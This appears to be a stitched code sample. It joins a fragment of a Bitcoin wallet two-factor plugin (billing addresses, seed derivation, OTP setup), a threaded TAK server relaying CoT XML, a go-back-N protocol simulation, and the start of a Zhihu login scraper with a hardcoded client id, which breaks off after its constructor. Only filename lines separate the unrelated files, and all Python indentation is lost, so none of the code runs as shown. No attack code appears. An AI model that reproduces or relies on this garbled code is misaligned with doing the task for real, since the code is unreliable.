# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.db.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.db.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.db.write(self.storage)
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(db):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = db.get('x1/')['xpub']
xpub2 = db.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].can_sign(tx, ignore_watching_only=True):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
assert tx
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure) -> None:
raise NotImplementedError()
@hook
def get_tx_extra_fee(self, wallet, tx: Transaction):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(repr(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
seed_type = '2fa_segwit' if self.config.get('seedtype') == 'segwit' else '2fa'
self.create_seed(wizard, seed_type)
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.opt_bip39 = False
wizard.opt_ext = True
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
if t == '2fa':
if n >= 20: # old scheme
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif n == 12: # new scheme
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception(f'unrecognized seed length for "2fa" seed: {n}')
elif t == '2fa_segwit':
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception(f'unexpected seed type: {t}')
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate(aborted=True)
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate(aborted=True)
except Exception as e:
wizard.show_message(repr(e))
wizard.terminate(aborted=True)
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, db):
if db.get('wallet_type') != '2fa':
return
if not db.get('x1/'):
return self, 'show_disclaimer'
if not db.get('x2/'):
return self, 'show_disclaimer'
if not db.get('x3/'):
return self, 'accept_terms_of_use'
|
server.py
|
#######################################################
#
# TAKFreeServer.py
# Original author: naman108
# This code is Open Source, made available under the EPL 2.0 license.
# https://www.eclipse.org/legal/eplfaq.php
# credit to Harshini73 for base code
#
#######################################################
import sys
import os
PACKAGE_PARENT = '..'
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))
import socket
import threading
import argparse
import time
import xml.etree.ElementTree as ET
import constants
import logging
from Controllers.RequestCOTController import RequestCOTController
from Controllers.serializer import Serializer
import multiprocessing as multi
const = constants.vars()
from logging.handlers import RotatingFileHandler
import uuid
import datetime
import sqlite3
from SQLcommands import sql
sql = sql()
'''
configure logging
'''
format = logging.Formatter(const.LOGTIMEFORMAT)
logger = logging.getLogger(const.LOGNAME)
logger.setLevel(logging.DEBUG)
debug = RotatingFileHandler(const.DEBUGLOG, maxBytes=const.MAXFILESIZE,backupCount=const.BACKUPCOUNT)
debug.setLevel(logging.DEBUG)
warning = RotatingFileHandler(const.WARNINGLOG, maxBytes=const.MAXFILESIZE,backupCount=const.BACKUPCOUNT)
warning.setLevel(logging.WARNING)
info = RotatingFileHandler(const.INFOLOG, maxBytes=const.MAXFILESIZE,backupCount=const.BACKUPCOUNT)
info.setLevel(logging.INFO)
debug.setFormatter(format)
warning.setFormatter(format)
info.setFormatter(format)
logger.addHandler(warning)
logger.addHandler(debug)
logger.addHandler(info)
logger.debug('called or imported')
hostname = socket.gethostname()
''' Server class '''
class ThreadedServer(object):
def __init__(self, host = const.IP, port=const.DEFAULTPORT):
#change from string
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
self.client_dict = {}
logger.info('startup ip is '+self.host+' startup port is '+str(self.port))
self.emergencyDict = {}
#configure sql database
sqliteServer = sqlite3.connect(const.DATABASE)
cursor = sqliteServer.cursor()
cursor.execute(sql.CREATEUSERSTABLE)
sqliteServer.commit()
cursor.close()
sqliteServer.close()
self.bandaidUID = ''
def listen(self):
'''
listen for client connections and begin thread if found
'''
threading.Thread(target = self.bandaid, args = (), daemon=True).start()
self.sock.listen(1000)
while True:
try:
client, address = self.sock.accept()
threading.Thread(target = self.listenToClient,args = (client,address), daemon=True).start()
except Exception as e:
logger.warning('error in main listen function '+str(e))
#issue in following func
def bandaid(self):
while True:
start = datetime.datetime.now()
end = start + datetime.timedelta(minutes = const.RENEWTIME)
while datetime.datetime.now() < end:
time.sleep(10)
self.bandaidUID=uuid.uuid1()
mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mysock.connect(('127.0.0.1', const.DEFAULTPORT))
mysock.send(Serializer().serializerRoot(RequestCOTController().ping(eventuid = self.bandaidUID)).encode())
mysock.recv(2048)
mysock.shutdown(socket.SHUT_RDWR)
mysock.close()
logger.info('finished bandaid keepalive')
logger.info('nuber of threads is ')
logger.info(threading.enumerate())
def check_xml(self, xml_string, current_id):
'''
check xml type or class
'''
data_value = ''
try:
if xml_string == const.EMPTY_BYTE:
print('client disconnected via empty byte response')
self.client_dict[current_id]['alive'] = 0
logger.info(str(self.client_dict[current_id]['uid'])+' disconnected')
return const.FAIL
elif xml_string == None:
print('client disconnected via none response')
self.client_dict[current_id]['alive'] = 0
logger.info(str(self.client_dict[current_id]['uid'])+' disconnected')
return const.FAIL
tree = ET.fromstring(xml_string)
uid = tree.get('uid')
logger.debug('parsing data uid is ' +str(uid))
type = tree.get('type')
if type == "a-f-G-U-C":
self.client_dict[current_id]['id_data'] = xml_string
elif type == 'b-f-t-a':
detail = tree.find('detail')
marti = detail.find('marti')
dest = marti.find('dest')
destination = dest.attrib['callsign']
connData = self.client_dict[current_id]["id_data"]
for x in self.client_dict:
if self.client_dict[x]["callsign"] == destination:
self.client_dict[x]["main_data"].append(connData)
print('adding conn data to '+str(x))
logger.info('now adding connection data as follows')
logger.info(str(connData))
else:
pass
try:
uid_by_dot = uid.split('.')
uid_by_dash = uid.split('-')
except:
uid_by_dash = uid.split('-')
logger.debug(uid_by_dash)
if str(uid_by_dash[-1]) == '1' and str(uid_by_dash[-2]) == '1' and str(uid_by_dash[-3] == '9'):
for x in tree.iter('emergency'):
if x.get('cancel') != 'true':
self.emergencyDict[uid] = xml_string
else:
del self.emergencyDict[uid]
elif uid_by_dash[-1] == const.PING:
data_value = const.PING
elif len(uid_by_dot)>0:
if uid_by_dot[0] == const.GEOCHAT:
data_value = const.GEOCHAT
logger.info('received the following GeoChat '+str(xml_string))
else:
True
else:
logger.info('received the following CoT '+str(xml_string))
pass
#adds data to all connected client data list except sending client
for detail in tree.findall('detail'):
marti = detail.find('marti')
if marti != None:
sqliteServer = sqlite3.connect(const.DATABASE)
dest = marti.find('dest')
callsign = dest.attrib['callsign']
if type == 'b-f-t-a':
for x in self.client_dict:
id = x
if self.client_dict[id]['callsign'] == callsign:
self.client_dict[id]['main_data'].insert(-1 ,xml_string)
else:
pass
else:
for x in self.client_dict:
id = x
if self.client_dict[id]['callsign'] == callsign:
self.client_dict[id]['main_data'].append(xml_string)
else:
pass
else:
for x in self.client_dict:
if x == current_id:
pass
elif x!=current_id:
self.client_dict[x]['main_data'].append(xml_string)
return data_value
except Exception as e:
logger.warning('error in message parsing '+str(e))
logger.warning(xml_string)
def connectionSetup(self, client, address):
try:
sqliteServer = sqlite3.connect(const.DATABASE)
cursor = sqliteServer.cursor()
first_run = 1
#create client dictionary within main dictionary containing arrays for data and chat also other stuff for client enitial connection
current_id = 0
total_clients_connected = 0
total_clients_connected += 1
id_data = client.recv(const.STARTBUFFER)
print(id_data)
print('\n'+str(id_data))
print('\n \n')
tree = ET.fromstring(id_data)
uid = tree.get('uid')
if uid == self.bandaidUID:
return 'Bandaid'
callsign = tree[1][1].attrib['callsign']
current_id = uuid.uuid1().int
#add identifying information
self.client_dict[current_id] = {'id_data': '', 'main_data': [], 'alive': 1, 'uid': '', 'client':client, 'callsign':callsign}
self.client_dict[current_id]['id_data'] = id_data
self.client_dict[current_id]['uid'] = uid
cursor.execute(sql.INSERTNEWUSER,(str(current_id), str(uid), str(callsign)))
sqliteServer.commit()
cursor.close()
sqliteServer.close()
#print(self.client_dict)
logger.info('client connected, information is as follows initial'+ '\n'+ 'connection data:'+str(id_data)+'\n'+'current id:'+ str(current_id))
return str(first_run)+' ? '+str(total_clients_connected)+' ? '+str(id_data)+' ? '+str(current_id)
except Exception as e:
logger.warning('error in connection setup: ' + str(e))
logger.warning(id_data)
return "error"
def recieveAll(self, client):
try:
total_data = []
count = 0
dead = 0
final = []
#227:260
#360:393
while True:
data = client.recv(const.BUFFER)
print(sys.getsizeof(data))
if sys.getsizeof(data)==const.BUFFER+33:
total_data.append(data)
elif sys.getsizeof(data) < const.BUFFER+33:
total_data.append(data)
break
total_data=b''.join(total_data)
return total_data
except Exception as e:
logger.warning('error in receive all')
logger.warning(e)
return None
def listenToClient(self, client, address):
'''
Function to receive data from the client. this must be long as everything
'''
try:
defaults = self.connectionSetup(client, address)
if defaults == 'error':
client.shutdown(socket.SHUT_RDWR)
client.close()
return 1
elif defaults == 'Bandaid':
self.sock.shutdown(socket.SHUT_RDWR)
client.close()
return 1
else:
defaults = defaults.split(' ? ')
print(defaults)
first_run=defaults[0]
id_data=defaults[2]
current_id = defaults[3]
first_run = int(first_run)
id_data = bytes(id_data, 'utf-8')
current_id = int(current_id)
#main connection loop
killSwitch = 0
while killSwitch == 0:
#receive data
try:
if first_run == 0:
data = self.recieveAll(client)
logger.debug(data)
working = self.check_xml(data, current_id)
#checking if check_xml detected client disconnect
if working == const.FAIL:
timeoutInfo = Serializer().serializerRoot(RequestCOTController().timeout(eventhow = 'h-g-i-g-o', eventuid = uuid.uuid1(), linkuid = self.client_dict[current_id]['uid']))
print(timeoutInfo.encode())
logger.debug('sending timeout information')
if len(self.client_dict)>0:
for x in self.client_dict:
if x != current_id:
self.client_dict[x]['client'].send(timeoutInfo.encode())
else:
pass
else:
pass
uid = self.client_dict[current_id]['uid']
del self.client_dict[current_id]
sqliteServer = sqlite3.connect(const.DATABASE)
cursor = sqliteServer.cursor()
cursor.execute(sql.DELETEBYUID,(uid,))
sqliteServer.commit()
cursor.close()
sqliteServer.close()
client.shutdown(socket.SHUT_RDWR)
client.close()
break
elif working == const.PING:
logger.debug('received ping')
else:
pass
elif first_run == 1:
print('something \n')
for x in self.client_dict:
client = self.client_dict[x]['client']
if client != self.client_dict[current_id]['client']:
print('sending'+str(id_data))
print(id_data)
client.send(self.client_dict[current_id]['id_data'])
else:
pass
for x in self.client_dict:
data = self.client_dict[x]['id_data']
logger.debug('sending conn data '+str(self.client_dict[x]['id_data'])+'to '+str(client)+'\n')
client.send(data)
threading.Thread(target = self.sendClientData, args = (client, address, current_id), daemon=True).start()
#just some debug stuff
first_run = 0
except Exception as e:
logger.warning('error in main loop')
logger.warning(str(e))
client.close()
killSwitch =1
return 1
except Exception as e:
client.close()
return 1
def sendClientData(self, client, address, current_id):
killSwitch = 0
try:
while killSwitch == 0:
time.sleep(const.DELAY)
if killSwitch == 1:
break
if len(self.emergencyDict)>0:
for x in self.emergencyDict:
client.send(self.emergencyDict[x])
logger.debug('emergency activated')
else:
pass
if len(self.client_dict[current_id]['main_data'])>0:
for x in self.client_dict[current_id]['main_data']:
logger.debug(self.client_dict[current_id]['main_data'])
client.send(x)
print('\n'+'sent '+ str(x)+' to '+ str(address) + '\n')
self.client_dict[current_id]['main_data'].remove(x)
else:
client.send(Serializer().serializerRoot(RequestCOTController().ping(eventuid = uuid.uuid1())).encode())
client.shutdown(socket.SHUT_RDWR)
client.close()
except Exception as e:
logger.warning('error in send info '+str(e))
client.close()
return 1
def queryCallSign(self, uid):
for x in self.client_dict:
if self.client_dict[x]['uid']==uid:
return self.client_dict[x]['callsign']
else:
pass
def startup():
logger.info('starting windows service')
ThreadedServer(host = '',port = const.DEFAULTPORT).listen()
if __name__ == "__main__":
try:
parser=argparse.ArgumentParser()
parser.add_argument("-p", type=int)
args=parser.parse_args()
port_num = args.p
ThreadedServer('',port_num).listen()
except:
ThreadedServer(host = '',port = const.DEFAULTPORT).listen()
|
gobackn.py
|
import threading
import random
import time
import socket
LOCK = threading.Lock()
TIMEOUT = 1000
TIMEUP = False
NETWORK_LAYER_READY = True
BASE_TIME = int(round(time.time() * 1000))
current_milli_time = lambda: int(round(time.time() * 1000) - BASE_TIME)
TIMER = current_milli_time()
def add_zeroes(string, size):
zeroes = '0' * (size-len(string))
return zeroes + string
def add_zeroes_back(string, size):
zeroes = '0' * (size-len(string))
return string + zeroes
def get_lowest_ack(next_frame, ack):
print ()
while next_frame%MAX_SEQ != ack:
next_frame -= 1
return next_frame
def from_network_layer():
# Randomly generate data. Done.
repeat_string = random.randint(0, 65535)
times = random.randint(16, 110)
data = add_zeroes(bin(repeat_string)[2:], 16) * times
return data
def to_network_layer(msg):
# Todo -> Write this message onto a file
# print ('R: Received message.')
pass
def parse_message(msg):
# Parse the message and return a dictionary of seq_num, info and ack. Done.
r = {}
r['seq'] = int(msg[0:32], 2) % MAX_SEQ
r['ack'] = int(msg[32:64], 2)
length = int(msg[64:96], 2)
r['info'] = msg[256:(256+length)]
return r
def between(a, b, c):
abc = a<=b and b<c
cab = c<a and a<=b
bca = b<c and c<a
if abc or cab or bca:
return True
return False
def sent_details(frame, ack, length):
global TIMER
print ('\tSent Message: {0} of length: {1} and ack: {2} at time: {3}'.format(frame, length, ack, TIMER))
def send_data(frame_nr, frame_expected, ack_to_send, buffer):
sinfo = buffer[frame_nr]
sseq = "{0:b}".format(frame_nr)
ack = 0
if ack_to_send < 0:
ack = (frame_expected + MAX_SEQ - 1) % MAX_SEQ
else:
ack = ack_to_send
sack = "{0:b}".format(ack)
length = len(sinfo)
slength = "{0:b}".format(length)
# Construct the string to be sent. Done.
msg = add_zeroes(sseq, 32) + add_zeroes(sack, 32) + add_zeroes(slength, 32) + add_zeroes('', 160) + sinfo
msg = add_zeroes_back(msg, 2048)
SOCKET.sendall(msg.encode('utf-8'))
print ('--------------------------------')
sent_details(frame_nr, ack, len(sinfo))
# print ('S: Sent message frame: {0} and ack: {1}, length: {2}'.format(frame_nr, ack, len(sinfo)))
next_frame_to_send = 0
ack_expected = 0
frame_expected = 0
nbuffered = 0
ack_stack = []
def recieved_details(parsed_msg):
global frame_expected
global ack_expected
print ('\tExpected frame: {0} and ack: {1}'.format(frame_expected, ack_expected))
print ('\tReceived frame: {0} of length: {1} and ack: {2}'.format(parsed_msg['seq'], len(parsed_msg['info']), parsed_msg['ack']))
def recv_data():
global next_frame_to_send
global ack_expected
global frame_expected
global nbuffered
global ack_stack
global TIMER
while True:
try:
SOCKET.settimeout(10)
msg = SOCKET.recv(2048)
p = random.random()
if p > LOSS:
LOCK.acquire()
r = parse_message(msg)
print ('R: Received message from socket: at time: {0}'.format(TIMER))
recieved_details(r)
if r['seq'] is frame_expected:
ack_stack.append(frame_expected)
# print ('R: Received expected frame')
TIMER = current_milli_time()
print ('R: Timer Restarted {0}'.format(TIMER))
to_network_layer(r['info'])
frame_expected = (frame_expected + 1) % MAX_SEQ
if between(ack_expected, r['ack'], next_frame_to_send):
# print ('R: Received expected ack')
nbuffered = nbuffered - 1
ack_expected = (ack_expected + 1) % MAX_SEQ
LOCK.release()
else:
print ('R: FRAME DROPPED')
except socket.timeout:
LOCK.acquire()
print ('R: Received Timeout Error')
TIMEUP = True
LOCK.release()
def gobackn(socket, max_seq, start_first, loss):
global next_frame_to_send
global ack_expected
global frame_expected
global nbuffered
global ack_stack
global NETWORK_LAYER_READY
global SOCKET
global MAX_SEQ
global TIMEUP
global TIMEOUT
global TIMER
global BASE_TIME
global LOSS
LOSS = loss
MAX_SEQ = max_seq
TIMER = current_milli_time()
SOCKET = socket
buffer = []
sender = start_first
recv_thread = threading.Thread(target=recv_data)
recv_thread.start()
BASE_TIME = int(round(time.time() * 1000))
TIMER = current_milli_time()
if not sender:
ack_expected = MAX_SEQ - 1
while True:
curr_time = current_milli_time()
TIMEUP = curr_time-TIMER > TIMEOUT
send_frame = start_first or ack_stack
if TIMEUP and sender:
# Received timeout, re-send data
LOCK.acquire()
print ('S: Time up when next frame to be sent is {0}'.format(next_frame_to_send))
TIMER = current_milli_time()
print ('S: Timer Restarted {0}'.format(TIMER))
TIMEUP = False
if next_frame_to_send < MAX_SEQ:
next_frame_to_send = 0
else:
next_frame_to_send = get_lowest_ack(next_frame_to_send-1, ack_expected)
print ('S: Re-sending from {0}'.format(next_frame_to_send))
for i in range(nbuffered):
send_data(next_frame_to_send, frame_expected, -1, buffer)
next_frame_to_send = next_frame_to_send + 1
LOCK.release()
if NETWORK_LAYER_READY and send_frame:
print ('S: Sending frame: {0}'.format(next_frame_to_send))
buffer.append(from_network_layer())
LOCK.acquire()
nbuffered = nbuffered + 1
next_frame_to_send = next_frame_to_send + 1
ack_to_send = -1
if ack_stack:
ack_to_send = ack_stack.pop()
send_data(next_frame_to_send-1, frame_expected, ack_to_send, buffer)
LOCK.release()
if nbuffered < MAX_SEQ:
NETWORK_LAYER_READY = True
else:
NETWORK_LAYER_READY = False
|
zhihu_login.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: zhihu_login.py
Description : Forked from https://github.com/zkqiang/zhihu-login,并增加了推荐内容的爬取
Author : LSQ
date: 2020/10/16
-------------------------------------------------
Change Activity:
2020/10/16: None
-------------------------------------------------
"""
import base64
import hashlib
import hmac
import json
import re
import threading
import time
import os
import random
# 日志模块
import logging
import sys
# 邮件模块
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
import pytesseract
from pymongo import MongoClient
from pymongo.errors import DuplicateKeyError
from http import cookiejar
from urllib.parse import urlencode
import execjs
import requests
from PIL import Image
class ZhihuAccount(object):
"""
使用时请确定安装了 Node.js(7.0 以上版本) 或其他 JS 环境
报错 execjs._exceptions.ProgramError: TypeError: 'exports' 就是没有安装
然后在当前目录下执行: `$npm install jsdom`
"""
def __init__(self, username: str = None, password: str = None, sender: str = None, receivers: list = None,
mail_pass: str = None, logger=None):
self.logger = logger
self.username = username
self.password = password
self.sender = sender
self.receivers = receivers
self.mail_pass = mail_pass
self.login_data = {
'client_id': 'c3cef7c66a1843f8b3a9e6a1e3160e20',
'grant_type': 'password',
'source': 'com.zhihu.web',
'username': '',
'password': '',
'lang': 'en',
'ref_source': 'other_https://www.zhihu.com/signin?next=%2F',
'utm_source': ''
}
self.session = requests.session()
self.session.headers = {
'accept-encoding': 'gzip, deflate, br',
'Host': 'www.zhihu.com',
'Referer': 'https://www.zhihu.com/',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'
}
self.session.cookies = cookiejar.LWPCookieJar(filename='./cookies.txt')
